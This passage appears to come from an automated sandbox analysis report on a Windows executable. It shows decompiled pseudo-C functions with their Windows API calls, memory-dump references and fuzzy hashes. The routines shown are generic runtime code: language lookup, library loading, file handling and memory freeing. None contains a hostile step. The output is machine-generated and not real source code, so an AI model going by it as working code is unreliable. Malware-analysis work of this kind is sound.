                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FileInfoVersion$QuerySizeValue
                                                            • String ID:
                                                            • API String ID: 2179348866-0
                                                            • Opcode ID: db1b7188df03ba7b3b32e0e3197f16d1bbb1710ebdecda22b0e2c2fca2e7d661
                                                            • Instruction ID: 087fa93cc02b824bee97242c1a4c1e6fbe52d07f241be95d6751b2a9bfa32856
                                                            • Opcode Fuzzy Hash: db1b7188df03ba7b3b32e0e3197f16d1bbb1710ebdecda22b0e2c2fca2e7d661
                                                            • Instruction Fuzzy Hash: 19314771A042199FD710DFA9D941DAFB7F8EB48700B91447AF944E3252D778DD00C765
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040B110, Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 72%
                                                            			E0040B110(intOrPtr __eax, void* __ebx, signed int __ecx, signed int __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _t41;
				signed short _t43;
				signed short _t46;
				signed int _t60;
				intOrPtr _t68;
				void* _t79;
				signed int* _t81;
				intOrPtr _t84;

				_t79 = __edi;
				_t61 = __ecx;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t81 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00407B04(_v8);
				E00407B04(_v12);
				_push(_t84);
				_push(0x40b227);
				_push( *[fs:eax]);
				 *[fs:eax] = _t84;
				E00407A20(__ecx);
				if(_v12 == 0) {
					L14:
					_pop(_t68);
					 *[fs:eax] = _t68;
					_push(E0040B22E);
					return E00407A80( &_v28, 6);
				}
				E00407E48( &_v20, _v12);
				_t41 = _v12;
				if(_t41 != 0) {
					_t41 =  *(_t41 - 4);
				}
				_t60 = _t41;
				if(_t60 < 1) {
					L7:
					_t43 = E0040AE34(_v8, _t60, _t61,  &_v16, _t81); // executed
					if(_v16 == 0) {
						L00403730();
						E0040A7E4(_t43, _t60,  &_v24, _t79, _t81);
						_t46 = E0040AF60(_v20, _t60, _t81, _v24, _t79, _t81); // executed
						__eflags =  *_t81;
						if( *_t81 == 0) {
							__eflags =  *0x4bdc0c;
							if( *0x4bdc0c == 0) {
								L00403738();
								E0040A7E4(_t46, _t60,  &_v28, _t79, _t81);
								E0040AF60(_v20, _t60, _t81, _v28, _t79, _t81);
							}
						}
						__eflags =  *_t81;
						if(__eflags == 0) {
							E0040B044(_v20, _t60, _t81, __eflags); // executed
						}
					} else {
						E0040AF60(_v20, _t60, _t81, _v16, _t79, _t81);
					}
					goto L14;
				}
				while( *((short*)(_v12 + _t60 * 2 - 2)) != 0x2e) {
					_t60 = _t60 - 1;
					__eflags = _t60;
					if(_t60 != 0) {
						continue;
					}
					goto L7;
				}
				_t61 = _t60;
				E004088AC(_v12, _t60, 1,  &_v20);
				goto L7;
			}

















                                                            0x0040b110
                                                            0x0040b110
                                                            0x0040b113
                                                            0x0040b115
                                                            0x0040b117
                                                            0x0040b119
                                                            0x0040b11b
                                                            0x0040b11d
                                                            0x0040b11f
                                                            0x0040b120
                                                            0x0040b121
                                                            0x0040b123
                                                            0x0040b126
                                                            0x0040b12c
                                                            0x0040b134
                                                            0x0040b13b
                                                            0x0040b13c
                                                            0x0040b141
                                                            0x0040b144
                                                            0x0040b149
                                                            0x0040b152
                                                            0x0040b20c
                                                            0x0040b20e
                                                            0x0040b211
                                                            0x0040b214
                                                            0x0040b226
                                                            0x0040b226
                                                            0x0040b15e
                                                            0x0040b163
                                                            0x0040b168
                                                            0x0040b16d
                                                            0x0040b16d
                                                            0x0040b16f
                                                            0x0040b174
                                                            0x0040b19b
                                                            0x0040b1a1
                                                            0x0040b1aa
                                                            0x0040b1bb
                                                            0x0040b1c3
                                                            0x0040b1d0
                                                            0x0040b1d5
                                                            0x0040b1d8
                                                            0x0040b1da
                                                            0x0040b1e1
                                                            0x0040b1e3
                                                            0x0040b1eb
                                                            0x0040b1f8
                                                            0x0040b1f8
                                                            0x0040b1e1
                                                            0x0040b1fd
                                                            0x0040b200
                                                            0x0040b207
                                                            0x0040b207
                                                            0x0040b1ac
                                                            0x0040b1b4
                                                            0x0040b1b4
                                                            0x00000000
                                                            0x0040b1aa
                                                            0x0040b176
                                                            0x0040b196
                                                            0x0040b197
                                                            0x0040b199
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040b199
                                                            0x0040b185
                                                            0x0040b18f
                                                            0x00000000

                                                            APIs
                                                            • GetUserDefaultUILanguage.KERNEL32(00000000,0040B227,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040B2AE,00000000,?,00000105), ref: 0040B1BB
                                                            • GetSystemDefaultUILanguage.KERNEL32(00000000,0040B227,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040B2AE,00000000,?,00000105), ref: 0040B1E3
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: DefaultLanguage$SystemUser
                                                            • String ID:
                                                            • API String ID: 384301227-0
                                                            • Opcode ID: 8091743a5a45bbad2069f173d476493d8776fa257b9783c2651a700d4e0e0a8f
                                                            • Instruction ID: e5bcb09f7540d0846d638ab8db7cc306f2a88a3609992180fc1e837192b0f5a6
                                                            • Opcode Fuzzy Hash: 8091743a5a45bbad2069f173d476493d8776fa257b9783c2651a700d4e0e0a8f
                                                            • Instruction Fuzzy Hash: B0313070A142499BDB10EBA5C891AAEB7B5EF48304F50857BE400B73D1DB7CAD41CB9E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040B234, Relevance: 3.1, APIs: 2, Instructions: 55libraryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 58%
                                                            			E0040B234(void* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				short _v530;
				char _v536;
				char _v540;
				void* _t44;
				intOrPtr _t45;
				void* _t49;
				void* _t52;

				_v536 = 0;
				_v540 = 0;
				_v8 = 0;
				_t49 = __eax;
				_push(_t52);
				_push(0x40b2ee);
				_push( *[fs:eax]);
				 *[fs:eax] = _t52 + 0xfffffde8;
				GetModuleFileNameW(0,  &_v530, 0x105);
				E00408550( &_v536, _t49);
				_push(_v536);
				E0040858C( &_v540, 0x105,  &_v530);
				_pop(_t44); // executed
				E0040B110(_v540, 0,  &_v8, _t44, __edi, _t49); // executed
				if(_v8 != 0) {
					LoadLibraryExW(E004084EC(_v8), 0, 2);
				}
				_pop(_t45);
				 *[fs:eax] = _t45;
				_push(E0040B2F5);
				E00407A80( &_v540, 2);
				return E00407A20( &_v8);
			}











                                                            0x0040b241
                                                            0x0040b247
                                                            0x0040b24d
                                                            0x0040b250
                                                            0x0040b254
                                                            0x0040b255
                                                            0x0040b25a
                                                            0x0040b25d
                                                            0x0040b270
                                                            0x0040b27d
                                                            0x0040b288
                                                            0x0040b29a
                                                            0x0040b2a8
                                                            0x0040b2a9
                                                            0x0040b2b2
                                                            0x0040b2c1
                                                            0x0040b2c6
                                                            0x0040b2ca
                                                            0x0040b2cd
                                                            0x0040b2d0
                                                            0x0040b2e0
                                                            0x0040b2ed

                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B270
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B2C1
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FileLibraryLoadModuleName
                                                            • String ID:
                                                            • API String ID: 1159719554-0
                                                            • Opcode ID: c89eb0a175d0b8486c29a163bc28afc1dff8206c8c77fc3926f93841ada109dc
                                                            • Instruction ID: c66d7809fa1512833e1e01641763b0ecb7dd00f0751393a0e64d94d028879d96
                                                            • Opcode Fuzzy Hash: c89eb0a175d0b8486c29a163bc28afc1dff8206c8c77fc3926f93841ada109dc
                                                            • Instruction Fuzzy Hash: 35116070A4421CABDB10EB55CD86BDE77B8DB04304F5144BEE508B32C1DA785F848AA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00427154, Relevance: 3.0, APIs: 2, Instructions: 42fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 60%
                                                            			E00427154(void* __eax, void* __edx, void* __eflags) {
				int _v8;
				char _v16;
				long _v20;
				int _t13;
				intOrPtr _t27;
				void* _t32;
				void* _t34;
				intOrPtr _t35;

				_t32 = _t34;
				_t35 = _t34 + 0xfffffff0;
				if(E00427108(__eax,  &_v16) != 0) {
					_push(_t32);
					_push(0x4271b1);
					_push( *[fs:eax]);
					 *[fs:eax] = _t35;
					_t13 = DeleteFileW(E004084EC(__edx)); // executed
					_v8 = _t13;
					_v20 = GetLastError();
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(E004271B8);
					return E00427144( &_v16);
				} else {
					_v8 = 0;
					return _v8;
				}
			}











                                                            0x00427155
                                                            0x00427157
                                                            0x0042716c
                                                            0x00427177
                                                            0x00427178
                                                            0x0042717d
                                                            0x00427180
                                                            0x0042718b
                                                            0x00427190
                                                            0x00427198
                                                            0x0042719d
                                                            0x004271a0
                                                            0x004271a3
                                                            0x004271b0
                                                            0x0042716e
                                                            0x00427170
                                                            0x004271c9
                                                            0x004271c9

                                                            APIs
                                                            • DeleteFileW.KERNEL32(00000000,00000000,004271B1,?,0000000D,00000000), ref: 0042718B
                                                            • GetLastError.KERNEL32(00000000,00000000,004271B1,?,0000000D,00000000), ref: 00427193
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: DeleteErrorFileLast
                                                            • String ID:
                                                            • API String ID: 2018770650-0
                                                            • Opcode ID: 6bce5fda464dbdacec63520f594f5bcb5d9fb2b97579abb83185b4526990ec2d
                                                            • Instruction ID: b2b9a58b343adce66678156e8009272800f6ed28378062f2bcdc1a6b1bb3db77
                                                            • Opcode Fuzzy Hash: 6bce5fda464dbdacec63520f594f5bcb5d9fb2b97579abb83185b4526990ec2d
                                                            • Instruction Fuzzy Hash: 7AF0C831B08228ABDB01EFB5AC424AEB7E8DF0971479149BBE804E3341E6395D209698
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00421230, Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 37%
                                                            			E00421230(void* __eax, void* __ebx, int __edx) {
				struct HINSTANCE__* _v12;
				int _v16;
				int _t4;
				struct HINSTANCE__* _t9;
				void* _t12;
				intOrPtr _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;

				_t18 = _t19;
				_t20 = _t19 + 0xfffffff4;
				_t12 = __eax;
				_t4 = SetErrorMode(__edx); // executed
				_v16 = _t4;
				_push(_t18);
				_push(0x4212a2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				asm("fnstcw word [ebp-0x2]");
				_push(_t18);
				_push(0x421284);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				_t9 = LoadLibraryW(E004084EC(_t12)); // executed
				_v12 = _t9;
				_pop(_t16);
				 *[fs:eax] = _t16;
				_push(0x42128b);
				asm("fclex");
				asm("fldcw word [ebp-0x2]");
				return 0;
			}












                                                            0x00421231
                                                            0x00421233
                                                            0x00421237
                                                            0x0042123a
                                                            0x0042123f
                                                            0x00421244
                                                            0x00421245
                                                            0x0042124a
                                                            0x0042124d
                                                            0x00421250
                                                            0x00421255
                                                            0x00421256
                                                            0x0042125b
                                                            0x0042125e
                                                            0x00421269
                                                            0x0042126e
                                                            0x00421273
                                                            0x00421276
                                                            0x00421279
                                                            0x0042127e
                                                            0x00421280
                                                            0x00421283

                                                            APIs
                                                            • SetErrorMode.KERNEL32 ref: 0042123A
                                                            • LoadLibraryW.KERNEL32(00000000,00000000,00421284,?,00000000,004212A2), ref: 00421269
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ErrorLibraryLoadMode
                                                            • String ID:
                                                            • API String ID: 2987862817-0
                                                            • Opcode ID: 5d62b3fe4766baadd73c675683546c7f58e01c4ce11fe1a914dda1a55ed8f36c
                                                            • Instruction ID: 4174928c950a8c4d8a753a2a73b5e5f46ee32f9a8ef6f103d2b3a03bcfaff51e
                                                            • Opcode Fuzzy Hash: 5d62b3fe4766baadd73c675683546c7f58e01c4ce11fe1a914dda1a55ed8f36c
                                                            • Instruction Fuzzy Hash: 15F08270A14744BFDB115F779C5282BBAACE709B047A348BAF800F2691E53C48208574
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004052D4, Relevance: 2.6, APIs: 2, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004052D4() {
				intOrPtr _t13;
				intOrPtr* _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;
				void* _t26;
				void* _t28;
				void* _t31;

				_t28 =  *0x004BBADC;
				while(_t28 != 0x4bbad8) {
					_t2 = _t28 + 4; // 0x4bbad8
					VirtualFree(_t28, 0, 0x8000); // executed
					_t28 =  *_t2;
				}
				_t25 = 0x37;
				_t13 = 0x4b7080;
				do {
					 *((intOrPtr*)(_t13 + 0xc)) = _t13;
					 *((intOrPtr*)(_t13 + 8)) = _t13;
					 *((intOrPtr*)(_t13 + 0x10)) = 1;
					 *((intOrPtr*)(_t13 + 0x14)) = 0;
					_t13 = _t13 + 0x20;
					_t25 = _t25 - 1;
				} while (_t25 != 0);
				 *0x4bbad8 = 0x4bbad8;
				 *0x004BBADC = 0x4bbad8;
				_t26 = 0x400;
				_t23 = 0x4bbb78;
				do {
					_t14 = _t23;
					 *_t14 = _t14;
					_t8 = _t14 + 4; // 0x4bbb78
					 *_t8 = _t14;
					_t23 = _t23 + 8;
					_t26 = _t26 - 1;
				} while (_t26 != 0);
				 *0x4bbaf4 = 0;
				E00405884(0x4bbaf8, 0x80);
				_t18 = 0;
				 *0x4bbaf0 = 0;
				_t31 =  *0x004BDB80;
				while(_t31 != 0x4bdb7c) {
					_t10 = _t31 + 4; // 0x4bdb7c
					_t18 = VirtualFree(_t31, 0, 0x8000);
					_t31 =  *_t10;
				}
				 *0x4bdb7c = 0x4bdb7c;
				 *0x004BDB80 = 0x4bdb7c;
				return _t18;
			}











                                                            0x004052e2
                                                            0x004052f9
                                                            0x004052e7
                                                            0x004052f2
                                                            0x004052f7
                                                            0x004052f7
                                                            0x004052fd
                                                            0x00405302
                                                            0x00405307
                                                            0x00405309
                                                            0x0040530e
                                                            0x00405311
                                                            0x0040531a
                                                            0x0040531d
                                                            0x00405320
                                                            0x00405320
                                                            0x00405323
                                                            0x00405325
                                                            0x00405328
                                                            0x0040532d
                                                            0x00405332
                                                            0x00405332
                                                            0x00405334
                                                            0x00405336
                                                            0x00405336
                                                            0x00405339
                                                            0x0040533c
                                                            0x0040533c
                                                            0x00405341
                                                            0x00405352
                                                            0x00405357
                                                            0x00405359
                                                            0x0040535e
                                                            0x00405375
                                                            0x00405363
                                                            0x0040536e
                                                            0x00405373
                                                            0x00405373
                                                            0x00405379
                                                            0x0040537b
                                                            0x00405382

                                                            APIs
                                                            • VirtualFree.KERNEL32(004BBAD8,00000000,00008000,?,?,?,?,004053D4,0040CB76,00000000,0040CB94), ref: 004052F2
                                                            • VirtualFree.KERNEL32(004BDB7C,00000000,00008000,004BBAD8,00000000,00008000,?,?,?,?,004053D4,0040CB76,00000000,0040CB94), ref: 0040536E
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FreeVirtual
                                                            • String ID:
                                                            • API String ID: 1263568516-0
                                                            • Opcode ID: 2ac254642d4a9788115c799da738c06d3b344f11962515fad3d8dec7c1c1ac76
                                                            • Instruction ID: 8dfda0fc8014d777c4f42bdf36328f4fb77b4e1ecbcf9529c7d2d9386e1eba40
                                                            • Opcode Fuzzy Hash: 2ac254642d4a9788115c799da738c06d3b344f11962515fad3d8dec7c1c1ac76
                                                            • Instruction Fuzzy Hash: A5116D71A046008FC7689F199840B67BBE4EB88754F15C0BFE549EB791D7B8AC018F9C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004232EC, Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004232EC(long __eax, void* __edx) {
				short _v2052;
				signed int _t7;
				void* _t10;
				signed int _t16;
				void* _t17;

				_t10 = __edx;
				_t7 = FormatMessageW(0x3200, 0, __eax, 0,  &_v2052, 0x400, 0); // executed
				while(_t7 > 0) {
					_t16 =  *(_t17 + _t7 * 2 - 2) & 0x0000ffff;
					if(_t16 <= 0x20) {
						L1:
						_t7 = _t7 - 1;
						__eflags = _t7;
						continue;
					} else {
						_t20 = _t16 - 0x2e;
						if(_t16 == 0x2e) {
							goto L1;
						}
					}
					break;
				}
				return E00407BA8(_t10, _t7, _t17, _t20);
			}








                                                            0x004232f3
                                                            0x0042330b
                                                            0x00423313
                                                            0x00423317
                                                            0x00423320
                                                            0x00423312
                                                            0x00423312
                                                            0x00423312
                                                            0x00000000
                                                            0x00423322
                                                            0x00423322
                                                            0x00423326
                                                            0x00000000
                                                            0x00000000
                                                            0x00423326
                                                            0x00000000
                                                            0x00423320
                                                            0x00423339

                                                            APIs
                                                            • FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,00423C1E,00000000,00423C6F,?,00423E28), ref: 0042330B
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FormatMessage
                                                            • String ID:
                                                            • API String ID: 1306739567-0
                                                            • Opcode ID: 8c28d4cd2feba8420b72e2c8323dac74420019247290cbce7f55a68a80108edc
                                                            • Instruction ID: 75fedbff241bec6efc8727d26b236f8c34027f11b3bdd8370f626a5f6d270aaf
                                                            • Opcode Fuzzy Hash: 8c28d4cd2feba8420b72e2c8323dac74420019247290cbce7f55a68a80108edc
                                                            • Instruction Fuzzy Hash: 89E0D86075432121F624A9052C03B7B2129A7C0B12FE084367A80DE3D5DEADAF55525E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00422A18, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 31%
                                                            			E00422A18(void* __eax, void* __ebx, void* __ecx, void* __eflags) {
				char _v8;
				intOrPtr _t21;
				intOrPtr _t24;

				_push(0);
				_push(_t24);
				_push(0x422a5e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t24;
				E004229AC(__eax, __ecx,  &_v8, __eflags);
				GetFileAttributesW(E004084EC(_v8)); // executed
				_pop(_t21);
				 *[fs:eax] = _t21;
				_push(E00422A65);
				return E00407A20( &_v8);
			}






                                                            0x00422a1b
                                                            0x00422a22
                                                            0x00422a23
                                                            0x00422a28
                                                            0x00422a2b
                                                            0x00422a33
                                                            0x00422a41
                                                            0x00422a4a
                                                            0x00422a4d
                                                            0x00422a50
                                                            0x00422a5d

                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(00000000,00000000,00422A5E,?,?,00000000,?,00422A71,00422DE2,00000000,00422E27,?,?,00000000,00000000), ref: 00422A41
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 8cd9a521966ca01502d57987e2d96a70fbf8ec2bcb71e07358b87aea606a80f7
                                                            • Instruction ID: ce0c41168f735205187e46b6c3e9294348714fcf51f30dd0002a5427be662740
                                                            • Opcode Fuzzy Hash: 8cd9a521966ca01502d57987e2d96a70fbf8ec2bcb71e07358b87aea606a80f7
                                                            • Instruction Fuzzy Hash: D7E09231704308BBD721EB76DE9291AB7ECD788700BA14876B500E7682E6B86E108418
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00423DA8, Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00423DA8(signed int __ecx, void* __edx, signed char _a4, signed char _a8) {
				void* _t17;

				_t17 = CreateFileW(E004084EC(__edx),  *(0x4b92e0 + (_a8 & 0x000000ff) * 4),  *(0x4b92ec + (_a4 & 0x000000ff) * 4), 0,  *(0x4b92fc + (__ecx & 0x000000ff) * 4), 0x80, 0); // executed
				return _t17;
			}




                                                            0x00423de5
                                                            0x00423ded

                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00423DE5
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: dd9159e21b70a0e7bcb8d3c3b5b03a1c2ffc365921e6ade8a7c7864e99aae5ed
                                                            • Instruction ID: 37fe8146f2431012b4276926014d9d5fd10bf57e8855788e2bc853c5fce69268
                                                            • Opcode Fuzzy Hash: dd9159e21b70a0e7bcb8d3c3b5b03a1c2ffc365921e6ade8a7c7864e99aae5ed
                                                            • Instruction Fuzzy Hash: 81E048716441283FD6149ADE7C91F76779C9709754F404563F684D7281C4A59D1086FC
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00409FA8, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00409FA8(void* __eax) {
				short _v532;
				void* __ebx;
				void* __esi;
				intOrPtr _t14;
				void* _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t16 = __eax;
				_t22 =  *((intOrPtr*)(__eax + 0x10));
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					GetModuleFileNameW( *(__eax + 4),  &_v532, 0x20a);
					_t14 = E0040B234(_t21, _t16, _t18, _t19, _t22); // executed
					_t20 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t20;
					if(_t20 == 0) {
						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
					}
				}
				return  *((intOrPtr*)(_t16 + 0x10));
			}












                                                            0x00409fb0
                                                            0x00409fb2
                                                            0x00409fb6
                                                            0x00409fc6
                                                            0x00409fcf
                                                            0x00409fd4
                                                            0x00409fd6
                                                            0x00409fdb
                                                            0x00409fe0
                                                            0x00409fe0
                                                            0x00409fdb
                                                            0x00409fee

                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 00409FC6
                                                              • Part of subcall function 0040B234: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B270
                                                              • Part of subcall function 0040B234: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B2C1
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FileModuleName$LibraryLoad
                                                            • String ID:
                                                            • API String ID: 4113206344-0
                                                            • Opcode ID: 2301add7ea149dd4fbebfdf59b7b3942b6e3d1df22e9777a155c308e994de31e
                                                            • Instruction ID: 1beb63cefa55d3dba2b36e2095187d50c135a0cf4330adb642bee8d6847d8901
                                                            • Opcode Fuzzy Hash: 2301add7ea149dd4fbebfdf59b7b3942b6e3d1df22e9777a155c308e994de31e
                                                            • Instruction Fuzzy Hash: 7BE0C971A013119BCB10DE58C8C5A4A3798AB08754F044AA6AD24DF387D3B5DD1487D5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00423ED8, Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00423ED8(intOrPtr* __eax) {
				int _t4;
				intOrPtr* _t7;

				_t7 = __eax;
				_t4 = SetEndOfFile( *(__eax + 4)); // executed
				if(_t4 == 0) {
					return E00423CAC( *_t7);
				}
				return _t4;
			}





                                                            0x00423ed9
                                                            0x00423edf
                                                            0x00423ee6
                                                            0x00000000
                                                            0x00423eea
                                                            0x00423ef0

                                                            APIs
                                                            • SetEndOfFile.KERNEL32(?,7FBA0010,004B6358,00000000), ref: 00423EDF
                                                              • Part of subcall function 00423CAC: GetLastError.KERNEL32(004237FC,00423D4F,?,?,00000000,?,004B5F76,00000001,00000000,00000002,00000000,004B659E,?,00000000,004B65E2), ref: 00423CAF
                                                            Memory Dump Source
